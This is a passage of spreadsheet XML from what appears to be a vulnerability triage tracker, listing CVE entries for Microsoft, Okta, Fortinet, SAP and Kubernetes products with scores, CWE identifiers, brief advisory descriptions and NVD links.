        <v>5.3</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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06" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78631</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S407"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T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84386</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78635</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S409"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T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22575</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68785</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78624</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69615</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78560</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S414"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T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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6" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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7" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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8" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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9" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76959</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S420"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T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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21" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78508</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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2" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
